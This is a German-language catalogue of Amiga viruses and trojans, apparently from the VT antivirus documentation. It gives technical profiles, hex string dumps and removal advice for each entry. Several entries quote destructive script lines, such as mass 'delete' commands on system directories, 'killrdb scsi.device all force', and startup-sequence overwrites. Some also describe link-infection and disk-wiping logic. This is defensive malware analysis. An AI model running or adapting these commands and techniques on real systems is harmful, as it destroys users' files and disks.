Reines Zerstoerungsprogramm Speicher: immer ab $7F000 verbogener Vektor: $6c (Zeropage) Versucht durch die Anzeige einer Fensterleiste mit dem Titel Virus-Checker V6.72 zu taeuschen. Diese Version gibt es am 08.09.93 noch gar nicht. Die Leiste ist FUNKTIONSLOS !!! Ich vermute deshalb, das das Programm unter dem Namen Virus-Checker verbreitet wird. Ueberpruefen Sie bitte auch ihre startup-sequence. Namensbegruendung: (im File zu lesen) 72790000 56495255 532d4348 45434b45 ry..VIRUS-CHECKE 52205636 2e373200 62792041 2e492e53 R V6.72.by A.I.S 2e462e20 21212100 41000000 00000000 .F. !!!.A....... Schaden: Erhoeht ueber $6c eine Zaehlzelle. Sobald der Wert $50000 er- reicht ist wird eine Decodier-Routine ( EORI.B #$F7,(A0)+ ) an- gesprungen. Es ergibt sich: 4e710096 14212121 20435249 4d452044 Nq...!!! CRIME D 4f204e4f 54205041 59202121 21000100 O NOT PAY !!!... 7d2d5748 59204152 4520594f 55205357 }-WHY ARE YOU SW 41505049 4e472049 4c4c4547 414c2053 APPING ILLEGAL S 4f465420 3f000100 aa464245 43415553 OFT ?....FBECAUS 4520594f 55204152 45204120 4352494d E YOU ARE A CRIM 494e414c 20212121 21000100 d755414e INAL !!!!....UAN 44204245 20535552 453a0001 00966957 D BE SURE:....iW 45202841 2e492e53 2e462e29 2057494c E (A.I.S.F.) WIL 4c204745 5420594f 55202100 0100967d L GET YOU !....} 2841294e 54490001 00968728 4929494c (A)NTI.....(I)IL 4c454741 4c000100 96912853 29574150 LEGAL.....(S)WAP 50494e47 000100be a0284629 4f554e44 PING.....(F)OUND 4154494f 4e000100 beaa2d50 52455353 ATION.....-PRESS 204d4f55 53452054 4f20434f 4e54494e MOUSE TO CONTIN 55452d00 00000000 00000c0a 9b33336d UE-..........33m Dieser Text wird mit DisplayAlert ausgegeben. Sobald Sie die Maustaste klicken, beginnt der Laufwerkskopf zu steppen. Bitte tun sie das ihrem Laufwerk nicht zu lange an. Ein Tastatur- Reset hilft NICHT. Sie muessen den Computer ausschalten !!! In diesem File befindet sich noch mehr Muell. - AAA-Enhancer-Bomb Zerstoerungsprg. Laenge: 3984 Bytes KS2.04: ja KS3.0 : ja verbogener Vektor: DosWrite Resetfest: Nein Vermehrung: Nein Namensbegruendung: Fensterleiste: 5241573A RAW: 302F302F 3634302F 3230302F 4141412D 0/0/640/200/AAA- 456E6861 6E636572 20342E38 20627920 Enhancer 4.8 by usw. Taeuschtext: Im Fenster wird ein Text ausgegeben, in dem behauptet wird, dass dieses Prg. im A1200 und A4000 AAA-Chipset aktiviert. Nebenbei wird versucht, den Ruf von SHI zu schaedigen. Schaeden: Verbiegt DosWrite, sucht bei jedem Schreibzugriff nach Worten und Zahlen und versucht sie durch andere zu er- setzen. Wortdreher auch umgekehrt: perverse-reliable Computer-vibrator sexual-actual friend-bugger pocket-vagina follow stroke randy-ready blood-sperm bitch-woman head-hole rich-poor warm-cold open-lock love-hate meet-fuck lift-drop girl-wife kill-kiss look-piss nice-shit soft-hard ball-hand cock-nose dear-dead skin-cunt egg-lip car-ass Zahlendreher auch umgekehrt: 0-9 1-8 2-7 3-6 4-5 Waehrend die Wortdreher die Lauffaehigkeit kaum beeinflussen, wird durch die Umwandlung von $30 (0) in $39 (9) ein Programm zerstoert, da diese Hexwerte auch in Befehlsfolgen vorkommen. Als Beispiel steht unten der letzte Teil eines alten Echo-Be- fehls. Erstellung des zerstoerten Echo-Befehls: Ein DirUtility wurde geladen und der echo-Befehl von df0: nach df1: kopiert. echo orig: echo zerstoert: 340: 7420746f 20454348 t to ECH 340: 7420746f 20454348 t to ECH 348: 4f0a0000 42a90004 O...B... 348: 4f0a0000 42a90004 O...B... 350: 2401e58a 76001630 $...v..0 350: 2401e58a 76001639 $...v..9 ^^ ^^ 358: 28002343 00087201 (.#C..r. 358: 28002343 00087201 (.#C..r. 360: 2341000c b2a90008 #A...... 360: 2341000c b2a90008 #A...... 368: 6e00005c 2411e58a n..\$... 368: 6e00005c 2411e58a n..\$... 370: d4817600 16302800 ..v..0(. 370: d4817600 16392800 ..v..9(. ^^ ^^ 378: 7430b483 6e000016 t0..n... 378: 7439b483 6e000016 t9..n... ^^ ^^ 380: 2611e58b d6817800 &.....x. 380: 2611e58b d6817800 &.....x. 388: 18303800 7639b883 .08.v9.. 388: 18393100 7630b883 .91.v0.. ^^^^ ^^ ^^^^ ^^ 390: 6f000008 22290004 o...").. 390: 6f000008 22290004 o...").. 398: 4ed62429 0004720a N.$)..r. 398: 4ed62429 0004720a N.$)..r. 3a0: 4ead0010 2411e58a N...$... 3a0: 4ead0010 2411e58a N...$... 3a8: d4a9000c 76001630 ....v..0 3a8: d4a9000c 76001639 ....v..9 ^^ ^^ 3b0: 2800d283 74309282 (...t0.. 3b0: 2800d283 74399282 (...t9.. ^^ ^^ 3b8: 23410004 7601d6a9 #A..v... 3b8: 23410004 7601d6a9 #A..v... 3c0: 000c2203 609a2229 ..".`.") 3c0: 000c2203 609a2229 ..".`.") 3c8: 00044ed6 00000000 ..N..... 3c8: 00044ed6 00000000 ..N..... 3d0: 00000001 00000004 ........ 3d0: 00000001 00000004 ........ 3d8: 00000092 000003f2 ........ 3d8: 00000092 000003f2 ........ VT findet den Verursacher beim Filetest und im Speicher. Zerstoerte Files findet der VT NICHT !!! Das Virusteil setzt KEINEN Merker in befallene Files. Also kann VT nicht entscheiden ob $39 wirklich $39 ist oder umgewandelt werden muesste. Sobald bekannt ist, dass das File behandelt worden ist, ist die er- neute Zahlendrehung natuerlich moeglich. Hat jemand einen Tip, wie man die notwendige Behandlung erkennen koennte. Schwacher Trost: Bei der erneuten Behandlung des zerstoerten Files mit dem Virusteil wird wieder der Originalzustand hergestellt. Hinweis: Wurden sehr viele Prge. zum Kopieren markiert, so wurde haeufig der RootBlock von DF1: unbrauchbar. - ABLANK11-Trojan siehe bei KUK_CREW-Trojan - Abraham siehe Claas Abraham - ACCESS FORBIDDEN BB anderer Name: s.u. bei VCCofTNT-Virus - ACCESS FORBIDDEN 2 BB anderer Name: s.u. bei VCCofTNT-Virus - acp.ctrl Laenge: 56016 Bytes siehe bei Express 2.20 - ACP3.19-Trojan s.u. bei UA62-ACP-Trojan - Achtung-Trojan Zerstoerungsfile Filename: Achtung oder Achtung.exe Wird in einem angeblichen Demo-LHA weitergegeben. Laenge ungepackt: 14032 Bytes Verwendet ungerade Adresse: lea unger.Adr. ,a0 Der 68000-Proz. freut sich. Keine verbogenen Vektoren KEINE Vermehrung Empfehlung: Loeschen Decodiert mit subq.b #8,(a0)+ ist im File zu lesen: 79005241 4d3a5665 72776972 72756e67 y.RAM:Verwirrung 203e6e69 6c3a2064 72697665 20646830 >nil: drive dh0 3a206e61 6d652022 4c414d45 52222071 : name "LAMER" q 7569636b 206e6f69 636f6e73 0052414d uick noicons.RAM 3a566572 77697272 756e6700 6468303a :Verwirrung.dh0: 4c414d45 522e4141 41414141 41410000 LAMER.AAAAAAAA.. Schadensverlauf: Im File ist ein Original-Format-File enthalten. 6d617420 33372e31 30202835 2e362e39 mat 37.10 (5.6.9 31290a0d 00006963 6f6e2e6c 69627261 1)....icon.libra Dieser Teil wird unter dem Namen Verwirrung ins RAM: kopiert. Danach soll dh0: schnell mit dem Namen LAMER formatiert wer- den. Damit die Sache nicht zu leicht zu reparieren ist, wer- den danach neue Files (Laenge $2800) mit dem Namen LAMER.AAAAAAAA angelegt. Die 8 A werden dabei immer ver- aendert. Meine Empfehlung: Im Schadensfall - wagen Sie einen Reset und versuchen Sie mit Disksalv noch etwas zu retten. - Achtung-CRUa-Trojan Zerstoerungsfile Filename:AmigaRAR.exe Laenge: 9024 Bytes Das Achtung-File (siehe oben) wurde mit einem bisher (Juli 98) Packer (CRUa-Cr.) gepackt. "CRUa" sollte am Fileanfang zu lesen sein. Rest siehe oben. - ADAM BRIERLEY BB Cold immer $7E700 KEIN Virus !!!! Namensbegruendung: 2A202020 20434F44 45204259 20204144 * CODE BY AD 414D2042 52494552 4C455920 2020202A AM BRIERLEY * KEINE Vermehrungsroutine !!! Es handelt sich um einen Bootblock- lader, was man bei RICHTIGER Reassemblierung leicht feststellen kann. Es koennte sich sogar um einen BB handeln, aus dem eine Schutzroutine entfernt wurde (sehr viele NOPs an einer Stelle). Warum die Beschreibung doch hier steht und nicht in "VT andere BB"? Damit die Erbsenzaehler nicht 2 Texte lesen muessen !! VT kennt: 15.10.92 - Addy-Trojan File VT bietet nur loeschen an. Keine verbogenen Vektoren Nicht resetfest Laenge gepackt: 9584 Bytes Es wird ein Script-Packer verwendet, den ich bis jetzt nur selten gefunden habe. Braucht copy, delete mit FORCE (also neuere WB) und wait. Sonst Abbruch des Scripts. Fuehrt danach Reset aus. Im File ist zu lesen: 6d6f7279 0000434f 4e3a302f 302f3634 mory..CON:0/0/64 302f3230 302f5465 73743031 0000646f 0/200/Test01..do 732e6c69 62726172 79007261 6d3a7100 s.library.ram:q. 72616d3a 54656d70 00006364 2072616d ram:Temp..cd ram 3a54656d 700a5255 4e200000 00000000 :Temp.RUN ...... ;..... 00000000 00000000 00006364 2072616d ..........cd ram 3a54656d 70200a45 58454355 54452000 :Temp .EXECUTE . ;..... 00000000 00000000 00000000 0a656e64 .............end 636c690a 0a776169 7420330a 656e6463 cli..wait 3.endc 6c690a00 00000000 00000004 446f6974 li..........Doit Schaeden: Schreibt neuen Dir-Befehl (Addy-Dir-falsch s.u.) Veraendert startup-Sequence, User-Startup und Shell-Startup. Sie muessen jetzt leider auch von diesen Files ein Backup auf Disk haben. Shell-Startup: Vorher: ;...... Alias XCopy "Copy CLONE " Nachher: ;...... Alias XCopy "Copy CLONE " wAiT 5 Echo Wait 5 >>Sys:S/sTarTup-sEquEncE Startup-Sequence: Vorher: ;cls ;Testzeile ;testzeile ;testzeile Nachher: Prompt "aFraId ?..tHe fReAk wAs hEre 2 dEvEstAtE NDOS:>" wAiT 5 Also einfach den Beginn meiner Startup geloescht !!!!! User-Startup: Vorher: ;...... ;END AsimCDFS Nachher: ;...... ;END AsimCDFS wAiT 5 In RAM:T und RAM:Temp sind mehrere Files aufgetaucht, die aber durch den RESET wieder verschwinden. Ein Beispiel: Doit (ein Script) Inhalt: Type Ram:temp/Oups >Sys:s/StaRtup-SeqUeNcE Delete C:Dir Quiet Force Copy Ram:temp/Dir C: eCHo wAiT 5 >>SyS:s/sTarTuP-SeQuEnCe eCHo wAiT 5 >>SyS:s/uSeR-StaRtUp eChO wAiT 5 >>SyS:S/SheLl-StArtUp Echo Echo Wait 5 >>Sys:S/Shell-Startup >>Sys:S/sTarTup-sEquEncE Echo Error #0025 Programme Loop Unexpected Wait 1 Test01 - Addy-Dir-falsch: VT bietet loeschen an. Laenge gepackt: 2784 Bytes Laenge entpackt: 8248 Bytes Keine verbogenen Vektoren Keine Vermehrung Die Dir-Funktion wird NICHT erfuellt. Im entpackten File ist zu lesen: 69627261 72790053 3a442d54 4543545f ibrary.S:D-TECT_ 444f435f 4449534b 00000000 00000000 DOC_DISK........ Nach diesem File wird gesucht. Falls es nicht gefunden wird, erfolgt ein RESET. Ein D-TECT_DOC_Disk-File enthaelt z.B.: 4f454e49 580a4144 414d5320 46414d49 OENIX.ADAMS FAMI 4c592e48 494e5453 0a414456 2057494c LY.HINTS.ADV WIL 4c592042 45414d49 53482e53 4f4c0a41 LY BEAMISH.SOL.A ;usw........ Es handelt sich also um eine Aufzaehlung von Dateinamen, die sich auf der Disk befinden. Der falsche Dir-Befehl schafft nun eine Flaeche, auf der die Dateinamen in Gadgets dargestellt werden. Eine Zerstoerungs-Routine konnte ich durch diesen Dir-Befehl NICHT ausloesen. Trotzdem MUESSEN Sie diesen falschen Dir-Befehl ersetzen, da die echten Dir-Funktionen NICHT erfuellt werden. Hinweis: Sie koennen beim Testen von aelteren PD-Serien durchaus die Meldung "Addy-Dir-falsch" erhalten. Das Programm scheint also wirklich als eigenstaendiges Programm existiert zu haben. Nur heisst da das Programm NICHT dir, sondern 142, menu.exe usw. siehe z.B. 17BITb1277 oder 17BITb2193 . In diesen Faellen ist es NICHT schaedlich, da es seine Funktion erfuellt und der echte Dir-Befehl nicht beruehrt (geloescht) wurde. Warum gerade dieses alte Programm im Script (s.o) als Dir ver- wendet wird ? Keine Ahnung !!! Nachdem ich mehrfach darauf angesprochen wurde: Andere Antivirusprogramme erkennen ein Addy-Teil, auch wenn es NICHT "dir" heisst. Es handelt sich hier um FEHLERKENNUNGEN !!!! Nachvollziehen koennen Sie das z.B. auf 17BIT-Disks (s.o.) Hinweis: Mit der Pruefsummenoption (vgl. VT-Prefs) haetten auch aeltere VT den Dir-Befehl als veraendert erkannt. - ADO!-1-assign Zerstoerung Laenge: 3320 Bytes (also genau wie Original) KS1.3 ja 68040 ja Kein Vektor verbogen Dieses File soll vom HF-AB3D-Trojan erzeugt werden. Mir ist das auf verschiedenen Rechnern NICHT gelungen (s.u.). Ich habe das File ausgeschnitten, falls es auf irgendeinem Rechner wirk- lich funktioniert. Dieses File ZERSTOERT dann WIRKLICH !!! Im File ist zu lesen: 0000aff5 20790000 01dc20fc 41444f21 .... y.... .ADO! 51cffff8 4e756772 61706869 63732e6c Q...Nugraphics.l 69627261 72790000 00000000 00000000 ibrary.......... 73637369 2e646576 69636500 00000000 scsi.device..... Zerstoerungsergebnis: lZyl 0 Bl 0 00: 41444f21 41444f21 41444f21 41444f21 ADO!ADO!ADO!ADO! 10: 41444f21 41444f21 41444f21 41444f21 ADO!ADO!ADO!ADO! 20: 41444f21 41444f21 41444f21 41444f21 ADO!ADO!ADO!ADO! usw...... Es wird also auf dem scsi.device jeder Block (AUCH im Rigid-Be- reich) mit ADO! gefuellt. Nicht beschaedigt wird omni-scsi.de- vice usw. . VT bietet File Loeschen an. Schreiben Sie ein Original-assign nach c: zurueck. - ADO!-1-Trojan Zerstoerung Filename: HF-AB3D_Patch Nach File-ID : Monitor Patch For Alien Breed 3D II Filename: EVIL-COMMENT Nach File-ID : EVIL COMMENT FOR DAYDREAM - PURE E CODE! AN EVIL STATUS DOOR BY MATHEWS Laengen gepackt: 30560 Bytes Laengen ungepackt: 44096 Bytes KS1.3 ja 68040 ja Kein Vektor verbogen Das File enthaelt sehr viel Muell, der nicht ausgefuehrt wird. Eine Routine soll ein File c:assign (s.o.) schreiben. Bei mir ist auf KEINEM Rechner das File sauber geschrieben worden. Das File assign wurde IMMER so lang (egal ob Disk oder Syquest), bis das Medium voll war. Mit SID2 konnte ich dann in Abhaengigkeit vom verwendeter KS und/oder Prozessor die Filelaenge 0 oder eine andere Zahl lesen. Das File konnte mit SID2 immer geloescht wer- den. Weitere Schaeden bei diesem Schreibvorgang wurden auf der Syquest nicht festgestellt. VT bietet Loeschen an. - ADO!-2-Trojan Zerstoerung Filename: !aNSIaNIMATOR! Laengen gepackt: 113320 Bytes Laengen ungepackt: 113356 Bytes KS1.3 ja 68040 ja Kein Vektor verbogen Im File ist zu lesen: 0000aff5 20790000 01dc20fc 41444f21 .... y.... .ADO! 51cffff8 4e756772 61706869 63732e6c Q...Nugraphics.l 69627261 72790000 00000000 00000000 ibrary.......... 73637369 2e646576 69636500 00000000 scsi.device..... Unterschied zu Typ-1: Es wird nicht versucht, ein c:assign zu schreiben. Dieses Teil soll SOFORT zerstoeren und leider funktioniert es auch. VT bietet Loeschen an. - ADO!-3-Trojan Zerstoerung Filename: AGA_ITALY2.DEMO Laenge: 113452 Bytes Filename: AGA_JHL.prefs Laenge: 14960 Bytes Entpackt ist im AGA_ITALY-File zu lesen: 55736572 2d537461 72747570 002d5255 User-Startup.-RU 4e203e4e 494c3a20 5359533a 50726566 N >NIL: SYS:Pref 732f454e 562d4152 43484956 452f4147 s/ENV-ARCHIVE/AG 415f4a48 4c2e7072 65667300 00054543 A_JHL.prefs...EC 484f2000 002d5255 4e203e4e 494c3a20 HO ..-RUN >NIL: 5359533a 50726566 732f454e 562d4152 SYS:Prefs/ENV-AR 43484956 452f4147 415f4a48 4c2e7072 CHIVE/AGA_JHL.pr 65667300 0011203e 3e533a55 7365722d efs... >>S:User- 53746172 74757000 001f5359 533a5052 Startup...SYS:PR 4546532f 454e562d 41524348 4956452f EFS/ENV-ARCHIVE/ 4147412e 70726566 73000023 5359533a AGA.prefs..#SYS: 50524546 532f454e 562d4152 43484956 PREFS/ENV-ARCHIV 452f4147 415f4a48 4c2e7072 65667300 E/AGA_JHL.prefs. ;..... 312c3135 2900000a 52414d3a 5265626f 1,15)...RAM:Rebo 6f740004 4e494c3a ot..NIL: Ablauf: Der User soll durch ein Intro getaeuscht werden. In Wirklich- keit wird eine neue Zeile in die User-Startup geschrieben: RUN >NIL: SYS:Prefs/ENV-ARCHIVE/AGA_JHL.prefs Zwei Files werden nach Prefs/Env-Archive kopiert: AGA.prefs (ein codierter Text) AGA_JHL.prefs (Trojanteil) Am Ende des Intros wird ein Reboot ausgefuehrt. Dadurch wird sofort ueber die User-Startup das AGA_JHL-File geladen. Entpackt ist in AGA_JHL.prefs zu lesen: 00000020 5359533a 50524546 532f454e ... SYS:PREFS/EN 562d4152 43484956 452f4147 41322e50 V-ARCHIVE/AGA2.P 52454653 0000001f 5359533a 50524546 REFS....SYS:PREF 532f454e 562d4152 43484956 452f4147 S/ENV-ARCHIVE/AG 412e5052 45465300 0000000f 533a5363 A.PREFS.....S:Sc 61726543 726f772e 74787400 00000020 areCrow.txt.... 5359533a 50524546 532f454e 562d4152 SYS:PREFS/ENV-AR 43484956 452f6167 61322e70 72656673 CHIVE/aga2.prefs 00000014 433a4564 20533a53 63617265 ....C:Ed S:Scare 43726f77 2e747874 0000000e 454e563a Crow.txt....ENV: 61676133 2e707265 66730000 000e454e aga3.prefs....EN 563a6167 61332e70 72656673 V:aga3.prefs Weiterhin enhaelt das File eingelagert genau das File ADO!-1-assign (siehe oben). Dieses File ist VOLL !!!! zerstoerungsfaehig. ALLERDINGS hat AGA_JHL.prefs dieses File auf KEINEM meiner Rechner je geschrieben, sondern immer vorher abgebrochen. Deshalb wird die Lauffaehigkeit ange- zweifelt. Warum das File AGA_JHL.prefs dann doch von VT er- kannt wird? Damit manche "Erbsenzaehler" beruhigt sind. - AECrack-Trojan siehe bei WiREFACE-Trojan - AeReg.BBS-Trojan File ImplLib gepackt Laenge: 656 Bytes entpackt Laenge: 664 Bytes Keine Vermehrungsroutine Keine verbogenen Vektoren Zielgerichtet gegen AmiExpress Soll aus einer unregistrierten Version eine registrierte Version machen. Im entpackten File ist zu lesen: "/X registrator v0.1" "bbs:user.data",0 "bbs:user.key",0 "bbs:utils/express",0 "Registrator for Ami-Express",0 "Startup /X 3.9 Crack As Normal2,0 "Run Registrator v0.1",0 "To Update 3.9 to a Registation /X",0 "Registration LRA-11.0089",0 "This is an un-registered version of Express",0 "Registration UOB-09.0493",0 "Registration version of Express v3.9",0 Schadensverlauf: Mit dem Open-Befehl aus der dos.lib sollen drei BBS-Files (s.o.) geoeffnet werden (Mode-NewFile) und 11 Bytes geschrieben werden. Die Files haetten dann die Laenge 11 und die Original-Files waeren somit zerstoert, da sie ueberschrieben werden. Da ein Programmierfehler vorliegt (Filehandle !!) werden Files mit der Laenge 0 erzeugt und auch hier sind die Original-files zerstoert. Dringende Empfehlung: sofort loeschen VT.kennt: 12.09.93 anderer moeglicher Name: Registrator-Virus - AFFE-Virus s.u. SADDAM-Clone - AFFEx2-LVirus Linkvirusteil Fileverlaengerung: #1200 Bytes vgl. auch BBSTrav. und StrangeAt. Ab KS 2.04 Nicht ResetFest (Am Anfang s.u.) Verbogene Vektoren: LoadSeg, Cool, DoIo (abhaengig von Zaehlzelle) Im LinkTeil ist zu lesen: ff6c0ca8 affeaffe fffc6740 7200203c .l........g@r. < ^^^^^^^^ ;...... 46616872 74205a75 722048f6 6c6c6520 Fahrt Zur H.lle 49687220 44726563 6b736368 7765696e Ihr Dreckschwein 65202100 e !. ;...... 42404840 4e753030 30313100 01020304 B@H@Nu00011..... ^^^^^^^^ Nur der Text (Fahrt..) ist codiert und wird nie erreicht. Neu: Sucht beim Laden von Programmen in deren ersten Hunk nach bestimmten Buchstaben. Falls Antivirusprg.e geladen werden, entfernt sich das LinkPrg. sofort aus dem Speicher. (neue Idee) Funktioniert aber NICHT, wenn das Antivirusprg. VOR einem verseuchten File geladen wurde. Speicherverankerung: - Test, ob Loadseg schon verbogen (AFFEAFFE) - Verbiegen von LoadSeg (siehe oben). Vermehrung: Fuer die Vermehrung wird NUR LoadSeg verwendet. Test auf: - $3E9 (CodeHunk) wird gefunden Hinweis: 3E8-, 3F0-, 3F1-Hunks usw. werden ueberlaufen. - Filename enthaelt nicht . oder - - File noch nicht von dem eigenen Programm verseucht (01020304). - Medium validated und mind. 5 Blocks frei - File groesser #8500 und kleiner #180000 Bytes Das Teil linkt sich hinter den ersten Hunk, sucht im Original- Hunk nach $4EAE (jsr) und ersetzt jsr durch $4EBA (jsr(PC)). Die Sprungweite darf nicht groesser als $7FFE sein. Zerstoerung: Sobald eine Zaehlzelle einen hohen Wert und $DFF006 einen bestimmten Wert enthaelt, wird mit Cool und DoIo eine Zerstoerungsroutine aufgebaut. Trackdisk.device wird NICHT gefordert (also auch HD). Ab Block 0 (auch Rigid) wird in einer Schleife Muell geschrie- ben. pZyl 0 Bl 0 (Test mit Syquest) 00: 2c780004 202efe3a 41fa0056 21400002 ,x.. ..:A..V!@.. 10: 41fa0008 2d48fe3a 4e750c69 0002001c A...-H.:Nu.i.... ;usw. Da ist nichts mehr zu retten. - AFORT.BB Inst. Bekannter Filename: vmemkill v1.2 Laenge: 3452 Bytes Versucht durch Text im Cli zu taeuschen. In Wirklichkeit soll ein Virus-BB im Speicher installiert werden. Grosse Probleme ab KS2.04 . VT bietet Loeschen an. - AFORT.BB Virus Im Speicher immer ab $7F000 Verbogene Vketoren: Cool, DoIo, SumKickData Fordert trackdisk.device NICHT . KS1.3: ja ab KS2.04 GURU nach RESET (endlos) Beschreibt auch $102 und $112 . VT versucht alle drei Vektoren zurueckzusetzen. Im BB ist uncodiert zu lesen: 6d6b0041 464f5254 20566972 75732076 mk.AFORT Virus v 312e3074 2c207468 69732069 73206a75 1.0t, this is ju - AGA-Install-Trojan Zerstoerungsfile anderer moeglicher Name: AMOS-AGA-Install Filename: AGA-Install.exe Laenge: 74492 Bytes Keine verbogenen Vektoren Nach readme: Amos_Pro AGA extension v1.0b Ablauf: Oeffnet einen eigenen Bildschirm und gibt aus z.B. Smoking AGA Extension Installer Wenn Sie nun auf Install klicken werden ALLE Files geloescht. Probieren Sie etwas mit Disksalv zu retten. - AGA-ITALY2-Fake siehe bei ADO!-3-Trojan - ahkeym-Trojan Zerstoerungsfile Laenge ungepackt: 2168 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Empfehlung: sofort loeschen laut File.ID soll es sein: A-Heaven Master keymaker Am Anfang des Files ist uncodiert zu lesen: 724d5321 277e00a6 08726578 78737973 rMS!'~...rexxsys 6c69622e 6c696272 61727900 52455858 lib.library.REXX ;..... 3a1b451b 5b336d1b 5b33316d 20437245 :.E.[3m.[31m CrE 61546544 20576954 683a1b5b 336d1b5b aTeD WiTh:.[3m.[ 316d2027 52655858 4d615348 65522720 1m 'ReXXMaSHeR' ;usw. Wenn ich das richtig verstanden habe: Es wird zuerst ein Scriptfile erstellt. Danach wird dieses File mit dem Tool Rexxmasher (hab ich JETZT) in ein ausfuehrbares File ($3F3) umgewandelt. Damit die Gefahr nicht sofort erkannt wird, wird das Script CODIERT in einem DataHunk untergebracht. Auszuege aus dem Script: a) gegen Prometheus (BBS ??) sys:c/delete Prometheus:pmbs.key sys:c/delete Prometheus:daten/#? sys:c/delete Prometheus:bretter/#? ;usw. b) gegen jedermann: sys:c/delete sys:s/#? sys:c/delete sys:c/#? ;hier muesste dann schon Schluss sein sys:c/delete sys:libs/#? ;da c ja leer ;usw. c) gegen jedermann, der in c das Programm killrdb (kenne ich nicht) hat. Duerfte aber nicht gehen, da c ja schon leer. sys:c/killrdb scsi.device all force sys:c/killrdb oktagon.device all force ;usw. Am Schluss soll dann Reboot ausgefuehrt werden. Hinweis eines Anwenders (Juli 95): Danke a: RexxMasher ist ein Tool, welches AREXX-Scripte compiliert und zu lauffaehigen Programmen macht. b: Alle compilierten Files lassen sich mittels eines Passwortes wieder zu Arexxprogrammen machen. (Wusste ich NICHT) c: A-Heaven ist eine PMBS (Prometheus) Mailbox. A-Heaven hat bisher einige Tools fuer PMBS rausgebracht. Diese Tools sind alle in AREXX geschrieben. - aibon-Virus siehe bei Express2.20-Virus - aibon 2-Virus siehe bei Express2.20-Virus - Aids Vkill-Clone siehe dort Unterschied: 3 Bytes 1.Byte: in der Pruefsumme 2.Byte: Vermehrungszaehler 3.Byte: Einsprung in entschluesselten Text (ein Prg. springt z.B. nach $7ebc3, das 2. Prg. nach $7eba9) - AIDS-HIV SCA-Clone, Cool immer 7EC3E, nur anderer Text - AIFS-JITR-Virus BB Clone s.u. bitte nicht mit A.I.F.S verwechseln Nur Texte geaendert 444f5300 2e56d968 41494653 2c790000 DOS..V.hAIFS,y.. Belegt seinen Speicherbereich nicht und kann deshalb bei 1Meg von VT überschrieben werden und ist damit auch zerstoert. Bei 5 Meg wird das Teil sicher erkannt. Der Speicherplatz spielt KEINE Rolle bei der BB-Erkennung. - AKIMO-Virus File Link Installer: unbekannt Versionsabfrage: nein Namensbegruendung: siehe unten Verbogene Vektoren: nein Eigener Process: audio.device,a0 (a0=unsichtbar am Ende, damit Original-audio.device nicht beruehrt) Resetfest: Nein Fileverlaengerung: 1424 Bytes Link als erster Hunk. VT versucht den Process im Speicher abzuschalten. VT versucht den Linkteil aus einem File auszubauen. Im Linkteil ist zu lesen: 732e6c69 62726172 79006175 64696f2e s.library.audio. 64657669 6365a000 6466303a 63004c6f device..df0:c.Lo ^^ ^^^^^^ 61645742 00446972 00547970 65004d6f adWB.Dir.Type.Mo 756e7400 0000496e 7374616c 6c005365 unt...Install.Se 74436c6f 636b0045 6e64436c 69004c69 tClock.EndCli.Li 7374004d 616b6564 69720000 00000064 st.Makedir.....d Verankerung im Speicher: Eigener Process, der alle 90 Sekunden gestartet wird. Vermehrungsbedingungen: - Medium validated - File ausfuehrbar ($3F3) - kein Hunk_Name (4(File) muss 0 sein) - kein Hunk_Overlay ($c(File) muss 0 sein) - kein Hunk_Reloc (hat keine Routine um Nr. zu aendern) - File ist noch nicht verseucht (Test auf $160) - betroffenen LWe: In einem Loop wird df0 (s.o.) in df3-df0 und dh3-dh0 umbenannt. - betroffenen Files: loadWB usw. s.o. Es wird nach 90 Sekunden das naechste File und/oder das naechste LW gesucht. Diese ungewollten Zugriffe muessten auffallen. Da die obengenannten Files bei manchen WB-Versionen Reloc-Hunks besitzen, werden die entsprechenden Files dann nicht verseucht (getestet WB1.1-WB3.1). Das Teil soll sich melden, sobald eine Zaehlstelle den Wert $96 erreicht hat. - Der Mauszeiger wird in einen Text geaendert. AKIMO OF MAGIC - Alfons-Eberg-2.0-Trojan siehe bei Wireface - AlienNewBeat Cold, Cool, DoIo, nur KS1.2, Fastmem ja im Speicher immer ab $20000 Vermehrung: ueber BB Vermehrungszaehler: $2037e Text im BB sichtbar: z.B. THIS IS THE ALIEN NEW BEAT BOOT! Clone: EXORCIST , SATAN usw. - Ami-Hacker.BBS File Laenge gepackt : 3560 Bytes Laenge entpackt: 4460 Bytes Fundort z.B.: CD-LSD2:A/COMMS/AMIEX/ACS_HACK.LHA Keine Vermehrungsroutine Keine verbogenen Vektoren Also KEIN Virus Zielgerichtet gegen AmiExpress. Soll Daten aus der Mailbox be- sorgen. Im File ist zu lesen: 000000b5 54686520 416d692d 45787072 ....The Ami-Expr 65737320 50617373 576f7264 20486163 ess PassWord Hac 6b65722e 20427920 43726179 2d312046 ker. By Cray-1 F Empfehlung: Loeschen Siehe auch unten bei IconD-Typ E - AmIRC-DC-Trojan (Backdoor) Filename: AmIRC020 L: 257436 Bytes Im File ist zu lesen: 66662900 256c6400 416d4952 4320322e ff).%ld.AmIRC 2. 302e3420 2831322e 322e3938 29202d20 0.4 (12.2.98) - 536d6163 6b656420 75702062 79204469 Smacked up by Di 47695461 4c20436f 52527550 54696f4e GiTaL CoRRuPTioN 20313939 38210076 65640000 53004900 1998!.ved..S.I. Also auf jeden Fall nicht das aktuelle Original-AmIRC020-Programm. Nach Fremdaussagen soll in diesem Programm ein Backdoor ent- halten sein. "Insidern" scheinen die wiederholten Aktivi- taeten von Digital Corruption schon laenger bekannt zu sein, und die entsprechenden Amiga-Programme sollen inzwischen Abwehreintraege ermoeglichen. (Stand: Maerz 98) - AMIDA-FORPIB Virus BB Forpib-Clone s.u. 2e2e414d 4944412e 2e2e2e2e 2e2e2e2e ..AMIDA......... - AMIGA FANATIC Virus BB Im Speicher immer ab $7F300. Verbogene Vektoren: Cool $7F372 DoIo $7F3A8 KS2.04: bei mir GURU4 nach RESET mit schreibgeschuetzter Disk Fordert trackdisk.device nicht. Verlangt aber DOS0 . Vermehrung: BB Schaeden: Sobald eine Zaehlzelle den Wert 3 erreicht hat, soll der Root- bereich ($6E000 stimmt nur bei DD-Disk) mit Muell aus Speicher ab $70000 gefuellt werden. Das Virusteil meldet sich nicht mit Text. Im BB ist uncodiert zu lesen: f18051c8 ffec4e75 20202020 20202041 ..Q...Nu A 4d494741 2046414e 41544943 20202056 MIGA FANATIC V - Amiga Freak Forpib-Clone s.u. nur Name im BB geaendert - AMIGAKNIGHTVIRUS Filevirus Laenge: 6048 (ungepackt) DoIo, KickTag, KickCheckSum Schreibt in Root das File init_cli und auch in startup-sequence Sonst keine Schaeden festgestellt. Nach 5 Resets wird der Bildschirm schwarz und rosa Schrift fuer Text. Der Text ist bis dahin codiert. oberer Bildschirmbereich: YEAH, 